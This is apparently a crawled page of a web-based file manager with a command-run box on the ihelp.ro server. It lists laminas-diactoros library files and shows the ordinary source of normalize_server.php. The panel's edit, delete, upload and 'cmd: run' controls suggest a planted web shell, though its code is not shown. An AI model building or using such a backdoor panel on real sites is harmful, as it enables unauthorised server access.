/
var
/
www
/
vhosts
/
ihelp.ro
/
_OLD
/
vendor
/
laminas
/
laminas-diactoros
/
src
/
functions
/
/var/www/vhosts/ihelp.ro/_OLD/vendor/laminas/laminas-diactoros/src/functions
mkdir
upload
Name
Size
Mode
Actions
create_uploaded_file.legacy.php
619
0644
edit
dl
rm
create_uploaded_file.php
1192
0644
edit
dl
rm
marshal_headers_from_sapi.legacy.php
634
0644
edit
dl
rm
marshal_headers_from_sapi.php
1643
0644
edit
dl
rm
marshal_method_from_sapi.legacy.php
630
0644
edit
dl
rm
marshal_method_from_sapi.php
520
0644
edit
dl
rm
marshal_protocol_version_from_sapi.legacy.php
675
0644
edit
dl
rm
marshal_protocol_version_from_sapi.php
1008
0644
edit
dl
rm
marshal_uri_from_sapi.legacy.php
628
0644
edit
dl
rm
marshal_uri_from_sapi.php
6819
0644
edit
dl
rm
normalize_server.legacy.php
645
0644
edit
dl
rm
normalize_server.php
1837
0644
edit
dl
rm
normalize_uploaded_files.legacy.php
678
0644
edit
dl
rm
normalize_uploaded_files.php
4313
0644
edit
dl
rm
parse_cookie_header.legacy.php
609
0644
edit
dl
rm
parse_cookie_header.php
1278
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/_OLD/vendor/laminas/laminas-diactoros/src/functions/normalize_server.php
(1837B)
<?php /** * @see https://github.com/laminas/laminas-diactoros for the canonical source repository * @copyright https://github.com/laminas/laminas-diactoros/blob/master/COPYRIGHT.md * @license https://github.com/laminas/laminas-diactoros/blob/master/LICENSE.md New BSD License */ declare(strict_types=1); namespace Laminas\Diactoros; use function is_callable; /** * Marshal the $_SERVER array * * Pre-processes and returns the $_SERVER superglobal. In particularly, it * attempts to detect the Authorization header, which is often not aggregated * correctly under various SAPI/httpd combinations. * * @param null|callable $apacheRequestHeaderCallback Callback that can be used to * retrieve Apache request headers. This defaults to * `apache_request_headers` under the Apache mod_php. * @return array Either $server verbatim, or with an added HTTP_AUTHORIZATION header. */ function normalizeServer(array $server, callable $apacheRequestHeaderCallback = null) : array { if (null === $apacheRequestHeaderCallback && is_callable('apache_request_headers')) { $apacheRequestHeaderCallback = 'apache_request_headers'; } // If the HTTP_AUTHORIZATION value is already set, or the callback is not // callable, we return verbatim if (isset($server['HTTP_AUTHORIZATION']) || ! is_callable($apacheRequestHeaderCallback) ) { return $server; } $apacheRequestHeaders = $apacheRequestHeaderCallback(); if (isset($apacheRequestHeaders['Authorization'])) { $server['HTTP_AUTHORIZATION'] = $apacheRequestHeaders['Authorization']; return $server; } if (isset($apacheRequestHeaders['authorization'])) { $server['HTTP_AUTHORIZATION'] = $apacheRequestHeaders['authorization']; return $server; } return $server; }
Save
cmd:
run